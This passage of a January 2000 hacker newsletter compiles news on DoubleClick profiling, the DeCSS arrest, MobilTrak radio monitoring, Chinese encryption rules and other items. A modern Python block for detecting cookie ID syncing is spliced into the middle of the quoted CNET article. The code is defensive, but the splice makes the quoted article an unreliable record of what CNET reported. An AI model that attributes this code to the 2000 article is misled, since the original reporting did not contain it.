McNealy: Set it free

Sun CEO Scott McNealy has been laying the groundwork for the announcement for months by telling audiences that software is a service and should be free. McNealy recommended last year that the government require Microsoft to make free and open its application program interfaces, rather than break itself into pieces, as a preferred remedy in the current Department of Justice vs. Microsoft antitrust investigation.

"Free" is a relative term, however. Sun in December eliminated fees for Java 2 Standard Edition but still requires developers to pay for compatibility tests required to maintain their licenses. And Linux advocates and other industry watchers have claimed that the Sun Community Source License is not as free or open as Linux and other open-source licenses are.

Sun will pitch Solaris 8 against Microsoft's high-end Windows 2000 package called Windows 2000 Datacenter, which is in beta and won't be commercially available until midyear, at best. Sun in November announced a free early access version of Solaris 8.

Sun is positioning Solaris 8 as the most scalable and reliable network operating system on the market.
Microsoft, which stepped up its Windows 2000 marketing campaign within the past week, in anticipation of the Feb. 17 rollout of the product, is touting Windows 2000's reliability as its main selling point.

Zander: We'll never do Linux

Microsoft's not Sun's only worry. Sun must fend off growing encroachments by Linux, which not only is free but also is becoming more robust with help from Sun competitors IBM Corp., Intel Corp. and Hewlett-Packard Co.

Sun President Ed Zander told financial analysts last week that Sun will never adopt Linux as its operating system but will instead "put every ounce of R&D we have into Solaris."

"It amazes me to watch IBM and all those other companies chase Linux the way they did Windows NT five years ago," Zander said.

Sun has been working for over a year to offer Solaris under the Sun Community Source License but was stymied by the fact that it didn't own all the intellectual property inside Solaris. SCSL is a quasi open-source license that requires developers to return bug fixes to Sun, maintain compatibility and pay fees to Sun when they ship binaries based on Sun source code.

It is unclear how Sun has resolved its intellectual property issues. But that isn't stopping the company from working to get on the good side of the open-source community. Sun is sponsoring ApacheCon 2000, the first official conference of the Apache Software Foundation upcoming in March, and is helping with the Apache Foundation's Jakarta and Java Apache projects.

@HWA

53.0 HNN: Jan 25: Documents Prove Echelon not a Journalist Fabrication
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Brian Oblivion

For years DoD officials have claimed that the global eavesdropping network known as Echelon was nothing more than a myth fabricated by journalists. Now recently declassified papers by the NSA actually confirm the existence of the operation.

The NSA Declassified
http://www.gwu.edu/~nsarchiv/NSAEBB/NSAEBB23/index.html

(Go to the URL, there's a lot of material there - Ed)

@HWA

54.0 HNN: Jan 25: Japan Needs US Help With Defacements
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

On Monday Japan's Science and Technology Agency and Japan's Management and Coordination Agency had their web sites defaced. This is considered the first-ever defacement of a Japanese government computer system. Japanese officials have said that they will be seeking assistance from US officials in tracking down the perpetrators.

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000125/wr/japan_hackers_1.html

Tuesday January 25 12:44 AM ET

Japan Says to Seek U.S. Help to Deal With Hackers

TOKYO (Reuters) - Japan said on Tuesday it will seek help from the United States in an investigation into hackers who penetrated two government Web sites.

Computer systems at Japan's Science and Technology Agency were raided on Monday and its homepage was replaced with derogatory messages insulting the Japanese in the first-ever hacking of a Japanese government computer system.

Agency officials declined to give details of the derogatory messages. The homepage was also replaced with a direct access switch to adult magazine web sites, agency officials said.

Several hours later, Japan's Management and Coordination Agency also discovered a similar incident at its Web site.

Top government spokesman Mikio Aoki said the government would launch an extensive investigation into the incident, including possible help from Washington which was more advanced in dealing with hackers.

"The government must take all necessary measures including seeking help from the United States," Aoki told a regular news conference.

An agency spokesman said it was not immediately clear whether the same hacker was responsible for the two separate cases of infiltration.

@HWA

55.0 HNN: Jan 25: Car Radios Monitored by Marketers
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Soon we'll have to wear implants in our penises so that condom manufacturers can collect stats on how often their product is used for fucking. - Ed

From HNN http://www.hackernews.com/

contributed by Evil Wench

Originally developed as a means to gather real time Radio ratings information, technology created by Alabama based MobilTrak is now being used by marketers. The road side devices home in on emissions from car radios to determine exactly what station they are turned to. Now concert promoters are using the technology to determine what station concert attendees listen to as they park their cars when attending concerts.

Wired
http://www.wired.com/news/technology/0,1282,33799,00.html

Your Ears Are Their Business
by Noah Shachtman
3:00 a.m. 25.Jan.2000 PST

Even in the car, there's no hiding from marketers' prying eyes -- and ears.

Companies like concert mega-promoter SFX Entertainment are using a new device to find out what's being played on customers' radios as they pull into venue parking lots. The information is supposed to help businesses gauge the effectiveness of radio advertising campaigns.

But the system -- built by Alabama start-up Mobiltrak and installed at 13 SFX locations in Los Angeles, Phoenix, Atlanta, and elsewhere -- is coming under fire from privacy experts.

"Nobody would think that they're being monitored in a parking lot. And nobody would think that there's something of value in listening to a radio station while they're in that parking lot," said Brooklyn Law School professor Paul Schwartz. "But there is something of value here, and the people listening don't get any of that value. They're being polled without knowing they're in a poll."

By contrast, when the local supermarket videotapes your weekly grocery run, or Dell monitors your tech support call -- even when SFX tracks your visit to its Web site -- the companies let you know you're being observed. The major traditional measurement companies, like The Arbitron Company and Nielsen Media Research, pay a small stipend to the people they survey.

Mobiltrak counters that such efforts aren't needed with their system. Individual cars aren't being tracked, they argue, so there's no invasion of an individual's privacy.

"We can't link to a particular automobile. It's just not technically possible," claims Lucius Stone, Mobiltrak's director of sales and marketing. "It's a high-volume, random sample. It can only measure one radio at a time. And there's no way of telling which radio it is. It's most analogous to a traffic counter."

The technology relies on a simple principle: Every FM radio is not only a receiver, but a transmitter, too, emitting the same radio frequency (or "RF") as the station to which it's tuned. That's why airlines ask passengers to turn off their radios during takeoff and landing: to prevent interference with pilots and air traffic controllers' communications.

Mobiltrak picks up these RFs leaked from car radios' oscillators, and counts what stations are being played.

Many in the privacy community fear that the temptation to use this information to breach established bounds of discretion will be too great for Mobiltrak to resist.

"If it's merely aggregate information, not tied to an individual, then it's not really a concern," says Jason Catlett, president of consumer privacy group Junkbusters. "But there's an economic incentive to get down to the individual level, and a precedent for using the same technology to look at the individual householder."

Like Mobiltrak, the British Broadcasting Company scrutinizes RF emissions. By law, British residents must have licenses for the television sets they own.
The BBC deploys vans equipped with oscillation detectors to residential neighborhoods to enforce the law. The vans track which homes are equipped with TV sets, and then check again to make sure that the residents have licenses for the TVs.

"TV license enforcement is the main reason that women end up in prison in the UK," University of Cambridge cryptographer Ross Anderson wrote in an email. "The detector vans operate during the day, so when they find an unlicensed set and knock on the door, it's usually a woman who answers. A fine of 1,000 pounds is imposed, and if she can't pay it she goes to jail."

What's more, Anderson and his colleagues have shown that the U.S. National Security Agency and others have long been able to use RF emissions to reconstruct what's on a computer monitor.

But this invasive operation is a far cry from what Mobiltrak is doing, say some media business insiders.

"I haven't met one person in the radio industry that's the least bit concerned about this from a privacy standpoint, as it currently exists," reports Ron Rodrigues, editor-in-chief of the trade magazine Radio & Records.

Still, Rodrigues acknowledges, "We seem to be in a period when disclosure is becoming more important. With Mobiltrak, there may have to be some sort of disclosure that people are being monitored, like radar on the California highways."

Schwartz, the Brooklyn law professor, believes something more than notification may be in order.

"We can collect all this information in new ways. But who should get the benefits of this information?" he asks. "Is it like minerals on the deep sea bed outside the continental shelf, exploitable for whoever can get to it first? Or should we return some of the benefits in more direct ways to the people who created it?"

@HWA

56.0 HNN: Jan 26: DoubleClick Admits to Profiling of Surfers
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

Internet Advertising Agency DoubleClick has started to match up web surfing habits with actual names and addresses, according to USA Today. DoubleClick's recent acquisition of Abacus Direct Corp., a direct-marketing services company that maintains a database of names, addresses, telephone numbers and retail purchasing habits of 90% of American households, has made this possible. By matching surfing habits with actual names and addresses DoubleClick is better able to target ads and offer 'personalized' service. The Electronic Privacy Information Center plans to file a complaint with the Federal Trade Commission by Feb. 16.

USA Today
http://www.usatoday.com/life/cyber/tech/cth211.htm

C|Net
http://news.cnet.com/news/0-1005-200-1531929.html?dtn.head

USA Today;

Activists charge DoubleClick double cross
Web users have lost privacy with the drop of a cookie, they say

By Will Rodger, USATODAY.com

Say goodbye to anonymity on the Web.

DoubleClick Inc., the Internet's largest advertising company, has begun tracking Web users by name and address as they move from one Web site to the next, USATODAY.com has learned.

The practice, known as profiling, gives marketers the ability to know the household, and in many cases the precise identity, of the person visiting any one of the 11,500 sites that use DoubleClick's ad-tracking "cookies."

What made such profiling possible was DoubleClick's purchase in June of Abacus Direct Corp., a direct-marketing services company that maintains a database of names, addresses and retail purchasing habits of 90% of American households. With the help of its online partners, DoubleClick can now correlate the Abacus database of names with people's Internet activities.

Company spokeswoman Jennifer Blum said Tuesday that only about a dozen sites are participating now.
But she acknowledged that DoubleClick would like all its partner sites to participate.

DoubleClick defends the practice, insisting that it allows better targeting of online ads -- and thus makes consumers' online experiences at once more relevant and more profitable for advertisers. The company calls it "personalization."

Consumer advocates have another term for it: privacy invasion. After being informed of DoubleClick's actions, several privacy activists said they would file a formal complaint with the Federal Trade Commission next month.

"This is a blatant bait-and-switch trick," says Jason Catlett of Junkbusters Inc., an Internet-privacy consultancy. "For four years they have said (their services) don't identify you personally, and now they're admitting they are going to identify you."

To tie DoubleClick's "anonymous" records of your surfing habits to its Abacus database, it needs only the cooperation of another site that can identify you positively. Futuristic though that sounds, positive identification is actually simple. DoubleClick need only tie your cookie to another one placed by a site that ships you something through the mail, or one which requires registration.

To do that:

   DoubleClick sends a cookie to your browser and gives it a unique ID number.
   DoubleClick sends the same ID number on to the site that knows who you are.
   That company then sends back the data that DoubleClick needs to look you up in the Abacus database.
   And voila -- DoubleClick knows who you are, too.

The combination of DoubleClick's cookie-derived information -- more than 100 million files -- with Abacus' database on the purchasing habits of 90 million households means the vast majority of Web-connected Americans will likely lose their online anonymity, says David Banisar, deputy director of Privacy International.

DoubleClick's Blum said she was not sure whether surfing habits tracked by DoubleClick before Abacus data are merged will be included in future profiles.

DoubleClick executives maintain they still give users who don't want to be tracked a chance to opt out. "That person will receive notice that their personal information is being gathered," DoubleClick Senior Vice President and Abacus unit chief Jonathan Shapiro says flatly.

Yet, that chance to opt out comes only in the form of a few lines of text placed in the privacy policies of participating Web sites. Since those policies are often buried two or three levels down, online consumers will seldom know what is being done with their personal information in the first place, let alone that they may opt out, activists say.

"That is not permission," Banisar says. "That is fraudulent on its face."

Catlett, Banisar and the Electronic Privacy Information Center plan to file a complaint with the Federal Trade Commission by Feb. 16. They say they will charge that DoubleClick has duped consumers by suggesting the company's technology lets them remain anonymous. They expect to enlist a wide array of consumer groups to back their position.

Further troubling to privacy advocates is DoubleClick's refusal to say which Internet sites are furnishing them the registration rolls that DoubleClick needs to link once-anonymous cookies to names, addresses, phone numbers and catalog purchases.

"The fact that DoubleClick is not disclosing the names of the companies who are feeding them consumers' names is a shameful hypocrisy," Catlett says. "They are trying to protect the confidentiality of the violators of privacy."

Shapiro Tuesday bristled at Catlett's characterization. Any company that uses data from the Abacus database to target Internet ads must disclose it online, he says. Moreover, he adds, DoubleClick itself would hand over to privacy advocates the list of participating companies if it could. But as in many lines of business, partners frown when their relationships are disclosed without their permission, he says.

"If they all bought a billboard and said they work with us, that would be great," Shapiro says.

The controversy over DoubleClick began last summer, when the company announced it was buying Abacus Direct in a deal valued at more than $1 billion. Privacy experts had feared that DoubleClick would begin merging the two databases at some point. But they say they were unaware that DoubleClick had begun its profiling practice late last year.

Before its Abacus purchase, DoubleClick had made its money by targeting banner advertisements in less direct ways. DoubleClick ad-serving computers, for instance, check the Internet addresses of people who visit participating sites. Thus, people in their homes may see ads different from those seen by workers at General Motors, or a machine-tool company in Ohio.

Every time viewers see or click on those banners, DoubleClick adds that fact to individual dossiers it builds on them with the help of the cookies it drops on users' hard drives. Those dossiers, in turn, help DoubleClick target ads more precisely still, increasing their relevance to consumers and reducing unnecessary repetition. Those cookies remained anonymous to DoubleClick until now.

Being tracked as they move around the Web "doesn't measure up to people's expectation on the Net," says Robert Smith, publisher of the newsletter Privacy Journal. "They don't think that their physical locations, their names will be combined with what they do on the Internet. If they (DoubleClick) want to do that they have to expose that plan to the public and have it discussed."

-=-

CNET:

Privacy fears raised by DoubleClick database plans
By Courtney Macavinta
Staff Writer, CNET News.com
January 25, 2000, 8:10 p.m. PT

Having sealed its purchase of a direct marketing company, DoubleClick has begun signing up sites to create a network that will tie Web surfers' travels with their personal information and shopping habits--online and off.

The leading Web advertising company plans to build a database of consumer profiles that will include each user's "name, address, retail, catalog and online purchase histories, and demographic data," according to the company's new privacy policy. The database, which the company says will only be seen by DoubleClick, is intended to help members of its budding, U.S.-based Abacus Alliance perfect their target marketing.

The move comes a little over a month after New York-based DoubleClick completed its $1.7 billion acquisition of Abacus Direct and in the wake of the Federal Trade Commission's November probe on the growing trend of online profiling. Privacy advocates, who protested the deal from the start, have unsuccessfully tried to get the FTC to review the implications of the merger because they say it means one thing for consumers: less privacy.

Until recently, DoubleClick's policy was to not correlate personal information with its 100 million cookies, which are scattered worldwide. But the new database will rely on the cookies, which the company places on Net users' computers to record surfing habits and display pertinent advertising. Net users aren't informed when they are given a DoubleClick cookie unless their browser is preset to do so, but they can "opt out" through the company's Web site.

The more than 11,500 sites that belong to DoubleClick's network could feed into the new database, which will correlate with the personal information in Abacus' existing database of more than 2 billion consumer catalog transactions. The rollout was first reported by USA Today.

DoubleClick says that not all of the sites using its ad technology will join the alliance. "They have to somehow have something to give to be a member of this," said Jennifer Blum, DoubleClick's spokeswoman.

The new database works like this: In the past, if a person named Jane Doe had a DoubleClick cookie that detected that she loved golf-related sites, the company could show her ads for sports-related content. But in the future, if the same surfer gives personal information to a member of the Abacus Alliance, DoubleClick will know a lot more about her: that her name is Jane Doe, and that she used to buy sweaters and pants via Company X's catalog but hasn't done so for years. However, Jane did buy a coat online last month. Now DoubleClick can advise Company X to target Jane with Net ads instead of sending her a catalog.

"Yes, of course this will be done," Blum said. "The goal here is to match up the information."

DoubleClick says that the focus of the alliance is to eliminate junk mail and to give consumers information about products they want. But privacy advocates charge that the combined companies are finally acting on their potential to create one of the most extensive consumer profiles ever.

"Privacy advocates have been saying for years that marketers will turn the Net into a gigantic data-gathering machine for junk mail, telemarketing and advertising; now that machine is working," said Jason Catlett, founder of Junkbusters, a clearinghouse for privacy-protection measures.

DoubleClick contends that before members of the Abacus Alliance put information into the new database, they must inform consumers.

"Going forward, when a consumer puts in personal information to a Web site that is a member of this alliance, they will be told that the information will be shared with other parties," Blum said. "Consumers are given notice and choice if they want to opt out."

Blum said that once companies join the alliance they also must give Net users notice that their information is going to be shared--even if that person has shared information with the Web site before.
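The ID hand-off that both the USA Today step list and the CNET "Jane Doe" walk-through describe is an identifier sync: a tracker's cookie ID is passed in a request to a first-party site that already knows the visitor's name, and from then on the two datasets can be joined. The following is an added example, not DoubleClick's or any ad network's code, written from the defender's side: it runs a small ID-sync detector over a constructed browser request log (the hosts shop.example, news.example and ads.example, the cookie values and the partner_id parameter are all made up for the example) and then shows that blocking third-party cookies removes the join key the sync depends on.

```python
"""Spotting third-party ID sync ("cookie syncing") in a browser request log.

Added example, not DoubleClick's or any network's code. A value that travels
as a cookie to one host and reappears as a URL parameter sent to a different
host is the hand-off the article describes; a tracker cookie seen across
several top-level sites is the cross-site profile the cookie alone enables.
"""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

MIN_ID_LEN = 12  # ignore short cookie values such as "cart=2"

# Constructed sample log (hypothetical hosts and IDs):
#   page   = top-level site the user is on
#   url    = request made while on that page
#   cookie = Cookie header the browser sent with it
SAMPLE_LOG = [
    {"page": "shop.example", "url": "https://shop.example/account",
     "cookie": "session=s3ssionTokenValue01"},
    {"page": "shop.example", "url": "https://ads.example/ad?site=shop.example",
     "cookie": "id=8f3a9c2d1e4b7a60"},
    # the tracker's ID is handed to the first-party site, which knows the user's name
    {"page": "shop.example", "url": "https://shop.example/sync?partner_id=8f3a9c2d1e4b7a60",
     "cookie": "session=s3ssionTokenValue01"},
    {"page": "news.example", "url": "https://news.example/", "cookie": ""},
    {"page": "news.example", "url": "https://ads.example/ad?site=news.example",
     "cookie": "id=8f3a9c2d1e4b7a60"},
]


def parse_cookies(header):
    """'a=1; b=2' -> {'a': '1', 'b': '2'}; tolerates an empty header."""
    out = {}
    for part in header.split(";"):
        if "=" in part:
            name, _, value = part.strip().partition("=")
            out[name] = value
    return out


def cookie_owners(log):
    """Map each long cookie value to the set of hosts it was sent to."""
    owners = defaultdict(set)
    for entry in log:
        host = urlsplit(entry["url"]).hostname
        for value in parse_cookies(entry["cookie"]).values():
            if len(value) >= MIN_ID_LEN:
                owners[value].add(host)
    return owners


def find_id_syncs(log):
    """Return (id, tracker_host, receiving_host, url) for every request whose
    query string carries a value that is a cookie for some other host."""
    owners = cookie_owners(log)
    syncs = []
    for entry in log:
        parts = urlsplit(entry["url"])
        for values in parse_qs(parts.query).values():
            for value in values:
                for tracker in owners.get(value, ()):
                    if tracker != parts.hostname:
                        syncs.append((value, tracker, parts.hostname, entry["url"]))
    return syncs


def tracker_sites(log, tracker_host):
    """Top-level sites on which each of the tracker's cookie IDs was observed."""
    seen = defaultdict(set)
    for entry in log:
        if urlsplit(entry["url"]).hostname != tracker_host:
            continue
        for value in parse_cookies(entry["cookie"]).values():
            if len(value) >= MIN_ID_LEN:
                seen[value].add(entry["page"])
    return seen


def strip_third_party_cookies(log):
    """Mitigation: drop the Cookie header on requests to a host other than the
    page's own, as a browser that blocks third-party cookies would."""
    return [dict(e, cookie="" if urlsplit(e["url"]).hostname != e["page"] else e["cookie"])
            for e in log]


if __name__ == "__main__":
    for sync in find_id_syncs(SAMPLE_LOG):
        print("ID sync:", sync)
    print("sites per tracker ID:", dict(tracker_sites(SAMPLE_LOG, "ads.example")))
    print("syncs after blocking third-party cookies:",
          find_id_syncs(strip_third_party_cookies(SAMPLE_LOG)))
```

On the constructed log the detector reports one sync (the ads.example cookie ID arriving at shop.example as partner_id) and shows the same ID observed on both shop.example and news.example; after third-party cookies are stripped there is no tracker cookie left to match, so the partner_id value no longer links to anything. The same two passes (cookie values seen per host, then query values checked against them) work on a real HAR export, with the page field taken from the top-level navigation.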

But privacy watchdogs say an opt-out policy is not fair to consumers who may not realize that when a company says their information is being shared with a "third party," it's really the potentially enormous DoubleClick database.

"DoubleClick is trying to characterize this as choice, but its practice is based on opt out, not opt in," Catlett said. "We said this would happen-- behold it quietly has."

@HWA

57.0 HNN: Jan 26: Support for DeCSS Author Grows
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Gee the EFF is supporting this case? I'm amazed. - Ed

From HNN http://www.hackernews.com/

contributed by Jan and Zorro

Support for Jon Johansen, the 16 year old Norwegian author being persecuted by the MPA, is growing. Johansen and his father were arrested and their computer equipment confiscated yesterday. They were charged with violation of copyright laws.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2427192,00.html?chkpt=zdnntop

C|Net
http://news.cnet.com/news/0-1005-200-1531192.html?tag=st.ne.ron.lthd.1005-200-1531192

Wired
http://www.wired.com/news/business/0,1367,33889,00.html

CNN
http://cnn.com/2000/TECH/ptech/01/25/dvd.charge/index.html

Aftenposten - English version
http://www.aftenposten.no/english/local/d121315.htm

Electronic Frontier Foundation
http://www.eff.org/IP/Video/DeCSS_prosecutions/Johansen_DeCSS_case/20000125_eff_johansen_case_pressrel.html

ZDNet;

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

DVD hacker arrested in Norway
By Reuters
January 25, 2000 11:30 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2427192,00.html?chkpt=zdnntop

A Norwegian teenager has been charged with distributing a software program that enables users to make unauthorized copies of DVD movies, police said on Tuesday.

Jon Johansen is thought to have developed a program "that breaks the entire copyright protection of the DVD (digital versatile disc) system," said Inger Marie Sunde, a senior public prosecutor at Norway's economic crime unit.

"He is charged with breaking intellectual property laws," said Sunde. Johansen's father was also charged in the case, since the teen posted the source code on a Web site owned by his father.

Johansen refuted the charges in a CNN Norway article, saying that he has done nothing wrong. The 16-year-old student stressed that the program he and others on the Internet created was only meant for playing DVDs on computers running the Linux operating system.

Previously, when the movie industry contacted him and asked him to remove the source code, he complied so as to avoid a lawsuit. Despite his cooperation, the movie industry is suing anyway.

Major Hollywood studios, which use an encryption scheme on their DVDs to prevent unauthorized copying, have already taken legal action against three people in the United States who displayed Johansen's program on their Web sites.

Computer equipment confiscated

His program, known as DeCSS, is thought to have been the first program posted to the Internet that resulted from reverse engineering the DVD copy protection system.

Norwegian law firm Simonsen Musaeus said in a statement it had reported Johansen and his father, Per Johansen, to the police earlier this month on behalf of the Motion Picture Association (MPA), a lobby group for seven major Hollywood studios.

Sunde told Reuters police had questioned Jon Johansen late on Monday, searched his home and confiscated computer equipment. "He is a suspect, and we found that there were reasonable grounds for a search," she added.

Other sites reported that two computers, a cell phone and some CDs had been taken by police. In addition, Johansen had to inform police of all his passwords.

Simonsen Musaeus acts on behalf of U.S.
license agency DVD Copy Control Association and the MPA, which represents major Hollywood studios such as Sony's Sony Pictures Entertainment Inc., Seagram Co. unit Universal Studios Inc. and Warner Bros., a Time Warner Inc. (NYSE: TWX) unit.

A U.S. district court in New York on Friday ordered three people to remove Johansen's DeCSS program from their Web sites after the MPA filed a complaint.

DVDs store sound and pictures digitally on an optical disc with a storage capacity considerably greater than that of a regular CD-ROM.

-=-

CNET;

Teen charged in connection with DVD cracking tool
By Courtney Macavinta
Staff Writer, CNET News.com
January 25, 2000, 5:00 p.m. PT

update Norwegian police questioned and charged a 16-year-old student who sent the U.S. movie industry into a frenzy when he helped create a program that breaks the encryption on DVDs that spread like wildfire on the Net.

In an interview today, Jon Johansen said that police raided his house yesterday to collect evidence stemming from allegations that he violated trade secrets to create a program called DeCSS, which cracks the security code in the DVD Content Scrambling System. That, in turn, allows people to view digital movies through unauthorized players, such as computers running the Linux operating system.

Police seized several computers, a Nokia cellular phone and some CDs and then charged Johansen with breaking security to gain unauthorized access to data or software. He and his father, whose company's Web site was used to post the program, also were charged with copyright infringement. The son and father face two to three years in prison and fines if convicted.

Johansen said that several people developed the program to allow users to play DVDs on various PCs. The effort is described on OpenDVD.org.

"Our goal was to make it possible to watch DVDs under the Linux operating system," Johansen wrote in an email.

In the wake of the release of DeCSS, the film industry has vigorously tried to stamp out the program. The Motion Picture Association of America (MPAA) filed a lawsuit in New York against individuals who allegedly posted the program on their Web sites; the organization also is a founder of the DVD Copy Control Association, which filed a similar lawsuit in California. The judges in both cases have issued preliminary injunctions prohibiting the defendants from posting the code through the duration of the trials.

But Johansen argues that the MPAA has misled the public into believing that his program allows people to more easily copy DVDs.

"The (motion picture industry) is claiming that their encryption was copy protection," he said. "The encryption is in fact only playback protection, which gives the movie industry a monopoly on who gets to make DVD players."

The Electronic Frontier Foundation, which is defending the parties in both cases, argues that people have a right to discuss the "the technical insecurity of DVD" and demonstrate their points through reverse engineering.

The DVD association was formed in December of last year by companies that also are members of the MPAA, the Business Software Alliance and the Electronic Industries Alliance to license out the DVD Content Scrambling System.

-=-

Aftenposten;

(NO response from host at print time)

-=-

EFF;

FOR IMMEDIATE RELEASE
January 25, 2000

Norwegian Teen Becomes Industry's Latest Test Case
Motion Picture Industry Continues Campaign Against Open Source Software Community Over DVD Security

San Francisco -- The home of a Norwegian teenager was raided by the police today acting at the behest of the motion picture industry intent on suppressing discussion and distribution of DVD-viewing software developed outside of industry's monopoly on such software.

This action follows closely three lawsuits filed by the industry in California, New York, and Connecticut against numerous individuals and organizations including coders, journalists, an ISP, and numerous Netizens.

"The motion picture industry is using its substantial resources to intimidate the technical community into surrendering rights of free expression and fair use of information," said Tara Lemmey, Executive Director of the Electronic Frontier Foundation. "These actions are a wake-up call for the technical community. The process of reverse-engineering and public posting and commenting of code that the MPAA is attempting to suppress is fundamental to the development of commercial and open source software."

Sixteen-year-old Jon Johansen, who was among the first to post the DeCSS program that allows users to view DVDs on computers not using Windows or Macintosh operating systems, had his computer and cellular telephone seized by police. Both he and his father were questioned at length by the police and have been threatened with indictment for posting the code, which the motion picture industry claims was illegally created.

According to several international legal experts contacted by EFF, the industry is relying on untested legal theory in its case against Johansen. With regard to the industry's use of Norwegian Criminal Code sect 145(2), a provision making it illegal to "break a security arrangement" to access data, experts agree that it is not clear whether it can apply to a situation where someone breaks a security system to access material on a device of which that person is the owner. The second charge of contributory copyright infringement, as likely to be argued in this case, has also not been before the Norwegian courts.

The actions being brought by the motion picture industry have attracted the attention of the Global Internet Liberty Campaign (GILC), a coalition of over 50 international civil liberties and human rights groups.

"We believe that intellectual property owners should not be allowed to expand their property rights at the expense of free speech, legal reverse-engineering of software programs for interoperability reasons, and discussions of technical and scientific issues on the Internet," wrote GILC members in a statement released last week. "DVD-CCA's lawsuit is in direct conflict with United Nations human rights accords and the First Amendment of the United States Constitution." (EFF is a GILC member.)

EFF will continue fighting the industry's attempts to censor Web sites discussing DVD technology, including assisting Johansen and his family in finding legal representation in Norway. All of these steps are part of EFF's Campaign for Audiovisual Free Expression (CAFE), which it launched last summer to address complex societal and legal issues raised by new technological measures for protecting intellectual property rights.

For complete information on the MPAA and DVD-CCA cases, see:
http://www.eff.org/IP/Video

To learn more about EFF's Campaign for Audiovisual Free Expression, see:
http://www.eff.org/cafe

For information on the Global Internet Liberty Campaign, see:
http://www.gilc.org

The Electronic Frontier Foundation ( http://www.eff.org ) is a leading global nonprofit organization linking technical architectures with legal frameworks to support the rights of individuals in an open society. Founded in 1990, EFF actively encourages and challenges industry and government to support free expression, privacy, and openness in the information society. EFF is a member-supported organization and maintains one of the most-linked-to Web sites in the world.

[end]

@HWA

58.0 HNN: Jan 26: China To Require Crypto Registration
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Starting next Monday Chinese government officials will require that all businesses operating within China must register the type of commercial encryption software they use. The regulations also bar Chinese companies from buying products containing foreign-designed encryption software.

US National Newspaper - via Cryptome
http://cryptome.org/cn-crypto.htm

25 January 2000. Thanks to Anonymous.

Source: US national newspaper, January 25, 2000

Foreigners Must Disclose Internet Secrets to Beijing Soon
Encryption Rules For Firms Threaten Growth of the Web

By MATT FORNEY

BEIJING -- The Chinese government is about to require foreign firms to reveal one of their deepest secrets -- the type of software used to protect sensitive data transfers over the Internet.

By next Monday, foreign and Chinese companies must register the type of commercial encryption software they use. Such software makes it more difficult for hackers -- or governments -- to eavesdrop on electronic messages. Eventually, the companies must provide details of employees who use the software, making it easier for authorities to monitor personal and commercial use of the Internet.

In addition, the regulations bar Chinese companies from buying products containing foreign-designed encryption software. A strict interpretation would include such products as Netscape browsers or Microsoft Outlook, as well as the more complex equipment vital for conducting business securely over the Internet.

The rules are the latest sign of Beijing's unease with the Internet, which has been used by dissidents and members of the banned sect Falun Dafa to communicate and spread information. Authorities have tried to block sites and require users to register, but the number of users continues to rise and now totals about nine million.
The new rules, however, could slow the Internet's growth here. If companies offering electronic business services worry that the Chinese government is monitoring their transmissions, they could relocate outside China's borders, where they wouldn't have to reveal the type of encryption software they use.

"This is sending the wrong message to foreign investors," says Patrick Powers, director of China operations for the U.S.-China Business Council, who adds that "the foreign business community is deeply concerned."

So is the U.S. government, which recently approved the export of many types of encryption software. Commerce Secretary William Daley plans to raise the issue with senior Chinese officials this week in Switzerland during the annual World Economic Forum.

China revealed the new regulations on Oct. 15, in an order published in the Communist Party's flagship newspaper, the People's Daily. It demanded that "foreign organizations or individuals using encryption products or equipment containing encryption technology in China must apply" for permission by Jan. 31. It exempted diplomatic missions.

After meeting that application deadline, foreign companies must fill out a second round of paperwork. According to a copy of the forms, companies must name employees who are using encryption software and give the location of the computers they use, as well as their e-mail addresses and telephone numbers. The order adds that "no organization or individual can sell foreign commercial encryption products."

If enforced, the regulations would certainly complicate the development of the Internet in China. Most of the routers and servers that compose the nerve center of China's networks come from foreign companies, and often include encrypted software to ensure secure communications. The rules could force delays in network construction as Chinese software companies struggle to expand their encryption services.
"If IBM or Hewlett-Packard wants to sell an e-commerce Web server to China, it might have to isolate which parts relate to security" and then find Chinese companies to write the software, says Jay Hu, director of the Beijing branch of the U.S. Information Technology Office, an industry research group. "I don't think Chinese companies have that ability." Neither International Business Machines Corp. nor Hewlett Packard Co. would comment.

The encryption regulations could apply to just about anything that transmits sensitive digital information, including cell phones, Internet browsers and e-mail software. Microsoft's Outlook program uses low-level encryption, and the company might have to seek Chinese partners to design it anew. Alick Yan, a spokesman for Microsoft (China) Co., said it's too early to gauge the potential impact.

The government has created a new agency to enforce the regulations, but it isn't clear who controls the body. "We report to the State Council," which is China's cabinet, explained director Yang Lingjun, who declined to comment further. However many foreign-company officials, speaking anonymously, say they're afraid the organization is staffed by the Ministry of State Security, China's secret police.

@HWA

59.0 HNN: Jan 26: NEC Develops Network Encryption Technology
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

NEC Corp said on Wednesday it developed a new encryption technology to protect data on the Internet and other networks. The new technology, Cipherunicorn-A, creates several false keys in addition to the true encryption key, making it especially difficult for potential intruders to crack.
Reuters - via Yahoo

Wednesday January 26, 5:43 am Eastern Time

NEC develops encryption technology for networks

TOKYO, Jan 26 (Reuters) - NEC Corp said on Wednesday it developed a new encryption technology to prevent hackers from tapping into business-to-consumer exchanges on the Internet and other networks.

The new technology, Cipherunicorn-A, creates several false keys in addition to the true encryption key, making it especially difficult for potential intruders to crack, NEC said.

The technology also features a dynamic encryption code that can use key lengths of 128, 192 or 256 bits, offering higher levels of security than conventional methods with a fixed length of 128 bits, an NEC spokesman said.

